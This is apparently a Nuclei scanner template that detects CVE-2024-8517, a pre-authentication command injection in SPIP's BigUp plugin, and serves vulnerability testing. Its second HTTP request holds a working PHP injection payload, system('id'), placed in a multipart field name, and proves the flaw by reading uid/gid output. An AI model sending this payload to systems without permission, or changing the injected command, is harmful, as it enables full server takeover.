id: CVE-2024-8517

info:
  name: SPIP BigUp Plugin - Remote Code Execution
  author: DhiyaneshDk
  severity: critical
  description: |
    SPIP before 4.3.2, 4.2.16, and 4.1.18 is vulnerable to a command injection issue. A remote and unauthenticated attacker can execute arbitrary operating system commands by sending a crafted multipart file upload HTTP request.
  impact: |
    Unauthenticated attackers can execute arbitrary operating system commands through crafted multipart file upload requests, achieving complete server compromise and full control of the SPIP installation.
  remediation: |
    Update SPIP to version 4.3.2, 4.2.16, or 4.1.18 or later to address the command injection vulnerability in the BigUp plugin.
  reference:
    - https://blog.spip.net/Mise-a-jour-critique-de-securite-sortie-de-SPIP-4-3-2-SPIP-4-2-16-SPIP-4-1-18.html
    - https://thinkloveshare.com/hacking/spip_preauth_rce_2024_part_2_a_big_upload/
    - https://vulncheck.com/advisories/spip-upload-rce
    - https://github.com/fkie-cad/nvd-json-data-feeds
    - https://github.com/nomi-sec/PoC-in-GitHub
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-8517
    cwe-id: CWE-646
    epss-score: 0.93372
    epss-percentile: 0.99823
  metadata:
    verified: true
    max-request: 2
    shodan-query: http.favicon.hash:-1224668706
    fofa-query: "X-Spip-Cache"
  tags: cve,cve2024,intrusive,spip,rce,vuln

flow: http(1) && http(2)

variables:
  email: "{{randstr}}@{{rand_base(5)}}.com"
  string: "{{randstr}}"
  filename: "{{to_lower(rand_text_alpha(5))}}"

http:
  - raw:
      - |
        GET /spip.ph%70?pag%65=spip_pass&lang=fr HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'formulaire_action_args'
          - 'spip'
        condition: and
        internal: true

    extractors:
      - type: regex
        part: body
        group: 1
        name: formulaire
        regex:
          - name=['"]formulaire_action_args['"]\s*type=['"]hidden['"]\s*value=['"]([^'"]+)['"]
        internal: true

  - raw:
      - |
        POST /spip.ph%70?pag%65=spip_pass&lang=fr HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=5f02b65945d644d6a32847ab130e9586

        --5f02b65945d644d6a32847ab130e9586
        Content-Disposition: form-data; name="page"

        spip_pass
        --5f02b65945d644d6a32847ab130e9586
        Content-Disposition: form-data; name="lang"

        fr
        --5f02b65945d644d6a32847ab130e9586
        Content-Disposition: form-data; name="formulaire_action"

        oubli
        --5f02b65945d644d6a32847ab130e9586
        Content-Disposition: form-data; name="formulaire_action_args"

        {{formulaire}}
        --5f02b65945d644d6a32847ab130e9586
        Content-Disposition: form-data; name="formulaire_action_sign"


        --5f02b65945d644d6a32847ab130e9586
        Content-Disposition: form-data; name="oubli"

        {{email}}
        --5f02b65945d644d6a32847ab130e9586
        Content-Disposition: form-data; name="nobot"


        --5f02b65945d644d6a32847ab130e9586
        Content-Disposition: form-data; name="bigup_retrouver_fichiers"

        a
        --5f02b65945d644d6a32847ab130e9586
        Content-Disposition: form-data; name="RCE['.system('id').die().']"; filename="{{filename}}.txt"
        Content-Type: text/plain

        {{string}}
        --5f02b65945d644d6a32847ab130e9586--

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "uid=[0-9]+.*gid=[0-9]+.*"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100886d6d0f9b7087bf346253f3d9d833e4f039197110997739c294e4349498b1aa0220107949de373752cbb17d94f3857f23a6836f137f9091021ca445043a13a06969:922c64590222798bb761d5b6d8e72950